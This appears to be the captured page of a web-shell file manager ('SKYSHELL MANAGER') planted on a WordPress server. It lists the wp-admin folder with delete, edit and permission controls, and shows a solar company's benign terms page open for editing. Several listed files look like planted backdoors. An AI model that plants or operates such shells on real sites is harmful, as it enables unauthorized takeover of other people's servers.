📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: terms.php
<!DOCTYPE html> <!--[if lt IE 7]><html class="no-js lt-ie10 lt-ie9 lt-ie8 lt-ie7"> <![endif]--> <!--[if IE 7]><html class="no-js lt-ie10 lt-ie9 lt-ie8"> <![endif]--> <!--[if IE 8]><html class="no-js lt-ie10 lt-ie9"> <![endif]--> <!--[if IE 9]><html class="no-js lt-ie10"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js"> <!--<![endif]--> <head> <!-- Basic Page Needs --> <meta charset="utf-8"> <title>Finesolartools</title> <meta name="description" content=""> <meta name="author" content=""> <!-- Mobile Specific Metas --> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <!-- Favicons --> <link rel="shortcut icon" href="content/ski/images/favicon.ico"> <!-- FONTS --> <link rel='stylesheet' href='http://fonts.googleapis.com/css?family=Roboto:100,300,400,400italic,700'> <link rel='stylesheet' href='http://fonts.googleapis.com/css?family=Patua+One:100,300,400,400italic,700'> <link rel='stylesheet' href='http://fonts.googleapis.com/css?family=Lato:100,300,400'> <!-- CSS --> <link rel='stylesheet' href='css/global.css'> <link rel='stylesheet' href='content/ski/css/structure.css'> <link rel='stylesheet' href='content/ski/css/ski.css'> <link rel='stylesheet' href='content/ski/css/custom.css'> <!-- Revolution Slider --> <link rel="stylesheet" href="plugins/rs-plugin/css/settings.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> <style> .form-wrapper { display: flex; justify-content: center; /* horizontal center */ align-items: center; /* vertical center */ min-height: 80px; } .subscribe-box { display: flex; max-width: 450px; width: 100%; border: 2px solid #fff; border-radius: 30px; overflow: hidden; /* 🔥 important */ background: transparent; } .subscribe-box input { flex: 1; padding: 12px 15px; border: none; outline: none; background: #cfd6dc; /* light grey like your image */ font-size: 14px; } .subscribe-box button { padding: 12px 25px; border: none; background: #fe0713; color: #fff; font-weight: 500; cursor: pointer; } /* remove extra spacing issues */ .subscribe-box input, .subscribe-box button { margin: 0; } /* hover effect */ .subscribe-box button:hover { background: #c9030c; } </style> </head> <body class="template-slider layout-full-width one-page nice-scroll-on mobile-tb-left no-content-padding header-stack header-center minimalist-header sticky-header sticky-white ab-hide subheader-title-left menu-highlight menuo-no-borders footer-copy-center tr-content"> <!-- Main Theme Wrapper --> <div id="Wrapper"> <!-- Header Wrapper --> <div id="Header_wrapper"> <!-- Header --> <header id="Header"> <!-- Header - Logo and Menu area --> <div id="Top_bar"> <div class="container"> <div class="column one"> <div class="top_bar_left clearfix"> <!-- Logo--> <div class="logo"> <a id="logo" href="index.php" title="Finesolartools"><img class="logo-main scale-with-grid" src="content/ski/images/solar.png" /><img class="logo-sticky scale-with-grid" src="content/ski/images/solar.png"><img class="logo-mobile scale-with-grid" src="content/ski/images/solar.png"> </a> </div> <!-- Main menu--> <div class="menu_wrapper"> <nav id="menu" class="menu-main-menu-container"> <ul id="menu-main-menu" class="menu"> <li> <a href="index.php"><span>Home</span></a> </li> <li> <a href="about.php"><span>About Us</span></a> </li> <li> <a href="#0"><span>Services</span></a> <ul id="menu-main-menu" class="menu"> <li> <a href="installation.php"><span>Installation</span></a> </li> <li> <a href="solar-rooftop-system.php"><span>Solar Rooftop System</span></a> </li> <li> <a href="solar-ground-mounted-system.php"><span>Ground-Mounted System</span></a> </li> <li> <a href="solar-amc-services.php"><span>Solar AMC Services</span></a> </li> <li> <a href="solar-streetlight-service.php"><span>Solar Streetlight Service</span></a> </li> </ul> </li> <li> <a href="contact.php"><span>Contact Us</span></a> </li> </ul> </nav><a class="responsive-menu-toggle" href="#"><i class="icon-menu"></i></a> </div> <!-- Secondary menu area - only for certain pages --> <div class="secondary_menu_wrapper"></div> <!-- Banner area - only for certain pages--> <div class="banner_wrapper"></div> <!-- Header Searchform area--> <div class="search_wrapper"> <form method="get"> <i class="icon_search icon-search"></i><a href="#" class="icon_close"><i class="icon-cancel"></i></a> <input type="text" class="field" name="s" id="s" placeholder="Enter your search" /> <input type="submit" class="submit" value="" style="display:none;" /> </form> </div> </div> </div> </div> </div> </header> </div> <!-- Main Content --> <div id="Content"> <div class="content_wrapper clearfix"> <div class="sections_group"> <div class="entry-content"> <div class="section mcb-section full-width" id="contact" style="padding-top:60px; padding-bottom:0px;background-color: #000b50;"> <div class="section_wrapper mcb-section-inner"> <div class="wrap mcb-wrap one clearfix"> <!-- One Full Row--> <div class="column mcb-column one column_column"> <div class="column_attr align_center"> <h2 style="color: #e7e7e7;">Terms and Conditions</h2> </div> </div> </div> </div> </div> <div class="section mcb-section" style="padding-top:80px; padding-bottom:50px;"> <div class="section_wrapper mcb-section-inner"> <div class="wrap mcb-wrap one clearfix"> <!-- One Second (1/2) Column --> <div class="column mcb-column one column_column"> <div class="column_attr animate" data-anim-type="fadeInLeft" style="padding:0 10% 0 0;"> <p>Effective Date: 12-02-2026</p> <h3>Acceptance of Conditions</h3> <p>By accessing https://www.finesolartools.com, you agree to comply with these Terms & Conditions. If you do not agree, you should discontinue use of the website.</p> <h3>Description of Services</h3> <p>Fine Solar Tools offers solar equipment, tools, and related resources for general use. The content provided is for informational purposes and does not substitute professional or technical advice.</p> <h3>User Eligibility</h3> <p>Users must be at least 18 years old or access the platform under supervision. You agree to provide accurate information when using our services.</p> <h3>User Behavior</h3> <p>You are expected to use the website responsibly and not engage in activities that may disrupt operations, harm the platform, or violate any laws.</p> <h3>Orders and Transactions</h3> <p>All orders are subject to availability and confirmation. Prices and product specifications may change without notice. Payments are securely processed through third-party providers, and by placing an order, you authorize applicable charges.</p> <h3>Product Usage Responsibility</h3> <p>Solar tools and equipment should be installed and used according to proper guidelines. Fine Solar Tools is not responsible for damages resulting from incorrect installation, misuse, or lack of proper handling.</p> <h3>Shipping and Delivery</h3> <p>We aim to deliver products within estimated timelines, but delays may occur due to logistics or external factors. Responsibility transfers to the customer once the product is delivered.</p> <h3>Returns and Refunds</h3> <p>Returns are subject to our policy conditions. Items must meet eligibility requirements, and refund timelines may vary depending on the payment method.</p> <h3>Intellectual Property</h3> <p>All content on this website, including images, text, and branding, is owned by Fine Solar Tools and protected by applicable laws. Unauthorized use is prohibited.</p> <h3>Acceptable Use</h3> <p>Users must not attempt unauthorized access, introduce malicious software, or interfere with the normal functioning of the website.</p> <h3>Disclaimer of Services</h3> <p>The website and its services are provided without guarantees of uninterrupted or error-free performance.</p> <h3>Limitation of Liability</h3> <p>Fine Solar Tools shall not be held responsible for indirect or consequential damages, including financial loss, data loss, or damages caused by improper use of products.</p> <h3>Termination of Access</h3> <p>We reserve the right to suspend or terminate access to users who violate these Terms & Conditions.</p> <h3>Governing Law</h3> <p>These Terms are governed by applicable laws based on our operating jurisdiction.</p> <h3>Changes to Terms</h3> <p>We may update these Terms at any time. Continued use of the website indicates acceptance of the updated terms.</p> </div> </div> </div> </div> </div> <div class="section the_content no_content"> <div class="section_wrapper"> <div class="the_content_wrapper"></div> </div> </div> </div> </div> </div> </div> <!-- Footer--> <footer id="Footer" class="clearfix"> <!-- Footer copyright--> <div class="footer_copy"> <div class="container"> <div class="column one"> <div class="column_attr align_center animate" data-anim-type="bounceIn"> <form class="subscribe-form" method="post" id="sub"> <div class="form-wrapper"> <div class="subscribe-box"> <input type="email" name="email" placeholder="Enter your email address" required> <button type="submit" name="submit">Subscribe</button> </div> </div> </form> <div id="loader" style="display:none;color: #ffffff;padding-top: 10px;">Processing...</div> <div id="responseMessage" style="color: #ffffff;padding-top: 10px;"></div> <script> document.getElementById("sub").addEventListener("submit", function(event) { event.preventDefault(); let form = this; let formData = new FormData(form); // Show loader document.getElementById("loader").style.display = "block"; document.getElementById("responseMessage").innerText = ""; fetch("sub.php", { method: "POST", body: formData }) .then(response => response.text()) .then(data => { // Hide loader document.getElementById("loader").style.display = "none"; // Display server message document.getElementById("responseMessage").innerText = data.trim(); // Clear email field form.reset(); }) .catch(error => { document.getElementById("loader").style.display = "none"; document.getElementById("responseMessage").innerText = "An error occurred."; }); }); </script> <p>At Finesolartools, we are committed to powering a brighter and more sustainable future through reliable solar energy solutions in Bengaluru. With a strong focus on quality, innovation, and customer satisfaction, we specialize in end-to-end solar services from consultation and design to installation and maintenance.</p> <p>Our mission is to make clean energy accessible and affordable for homes, businesses, and industries. We understand the growing need for eco-friendly power, and our expert team works closely with clients to deliver customized solar solutions that maximize efficiency and savings.</p> <p>Backed by industry knowledge and the latest technology, Finesolartools ensures every project is executed with precision and care. Whether you're looking to reduce electricity costs or contribute to a greener environment, we are here to help you transition seamlessly to solar energy.</p> <p>We take pride in building long-term relationships with our customers by providing transparent service, trusted products, and ongoing support.</p> <p>Switch to smart energy. Switch to Finesolartools.</p> </div> <div class="copyright" style="font-size: 12px;"> <a href="privacy.php">Privacy Policy</a> | <a href="terms.php">Terms & Conditions</a> | <a href="subscribe.php">Subscribe</a> | <a href="unsubscribe.php">Unsubscribe</a> <br> © 2026 Finesolartools. All rights reserved. </div> <!--Social info area--> </div> </div> </div> </footer> </div> <!-- JS --> <script src="js/jquery-3.6.0.min.js"></script> <script src="js/jquery-migrate-3.4.0.min.js"></script> <script src="js/mfn.menu.js"></script> <script src="js/jquery.plugins.js"></script> <script src="js/jquery.jplayer.min.js"></script> <script src="js/animations/animations.js"></script> <script src="js/scripts.js"></script> <script src="plugins/rs-plugin/js/jquery.themepunch.tools.min.js"></script> <script src="plugins/rs-plugin/js/jquery.themepunch.revolution.min.js"></script> <script src="plugins/rs-plugin/js/extensions/revolution.extension.video.min.js"></script> <script src="plugins/rs-plugin/js/extensions/revolution.extension.slideanims.min.js"></script> <script src="plugins/rs-plugin/js/extensions/revolution.extension.actions.min.js"></script> <script src="plugins/rs-plugin/js/extensions/revolution.extension.layeranimation.min.js"></script> <script src="plugins/rs-plugin/js/extensions/revolution.extension.kenburn.min.js"></script> <script src="plugins/rs-plugin/js/extensions/revolution.extension.navigation.min.js"></script> <script src="plugins/rs-plugin/js/extensions/revolution.extension.migration.min.js"></script> <script src="plugins/rs-plugin/js/extensions/revolution.extension.parallax.min.js"></script> <script src="http://maps.google.com/maps/api/js?sensor=false&ver=5.9"></script> <script src="js/email.js"></script> <script> var tpj = jQuery; var revapi1; tpj(document).ready(function() { if (tpj("#rev_slider_1_2").revolution == undefined) { revslider_showDoubleJqueryError("#rev_slider_1_2"); } else { revapi1 = tpj("#rev_slider_1_2").show().revolution({ sliderType:"hero", sliderLayout:"auto", dottedOverlay:"none", delay: 9000, navigation: {}, visibilityLevels: [1240, 1024, 778, 480], gridwidth: 1240, gridheight: 700, lazyType:"none", shadow: 0, spinner:"off", autoHeight:"off", disableProgressBar:"on", hideThumbsOnMobile:"off", hideSliderAtLimit: 0, hideCaptionAtLimit: 0, hideAllCaptionAtLilmit: 0, debugMode: false, fallbacks: { simplifyAll:"off", disableFocusListener: false, } }); } }); /*]]>*/ </script> <script> function google_maps_56854e1139a12() { var latlng = new google.maps.LatLng(-33.8710, 151.2039); var draggable = true; var myOptions = { zoom: 13, center: latlng, mapTypeId: google.maps.MapTypeId.ROADMAP, styles: [{ "featureType":"administrative", "elementType":"labels.text.fill", "stylers": [{ "color":"#444444" }] }, { "featureType":"landscape", "elementType":"all", "stylers": [{ "color":"#f2f2f2" }] }, { "featureType":"poi", "elementType":"all", "stylers": [{ "visibility":"off" }] }, { "featureType":"road", "elementType":"all", "stylers": [{ "saturation": -100 }, { "lightness": 45 }] }, { "featureType":"road.highway", "elementType":"all", "stylers": [{ "visibility":"simplified" }] }, { "featureType":"road.arterial", "elementType":"labels.icon", "stylers": [{ "visibility":"off" }] }, { "featureType":"transit", "elementType":"all", "stylers": [{ "visibility":"off" }] }, { "featureType":"water", "elementType":"all", "stylers": [{ "color":"#46bcec" }, { "visibility":"on" }] }], draggable: draggable, zoomControl: true, mapTypeControl: false, streetViewControl: false, scrollwheel: false }; var map = new google.maps.Map(document.getElementById("google-map-area-56854e1139a12"), myOptions); var marker = new google.maps.Marker({ position: latlng, icon:"content/ski/images/home_ski_pin.png", map: map }); } jQuery(document).ready(function($) { google_maps_56854e1139a12(); }); </script> <script> jQuery(window).on('load', function () { var retina = window.devicePixelRatio> 1 ? true : false; if (retina) { var retinaEl = jQuery("#logo img.logo-main"); var retinaLogoW = retinaEl.width(); var retinaLogoH = retinaEl.height(); retinaEl.attr("src","content/ski/images/solar.png").width(retinaLogoW).height(retinaLogoH); var stickyEl = jQuery("#logo img.logo-sticky"); var stickyLogoW = stickyEl.width(); var stickyLogoH = stickyEl.height(); stickyEl.attr("src","content/ski/images/solar.png").width(stickyLogoW).height(stickyLogoH); var mobileEl = jQuery("#logo img.logo-mobile"); var mobileLogoW = mobileEl.width(); var mobileLogoH = mobileEl.height(); mobileEl.attr("src","content/ski/images/solar.png").width(mobileLogoW).height(mobileLogoH); } }); </script> </body> </html>
Save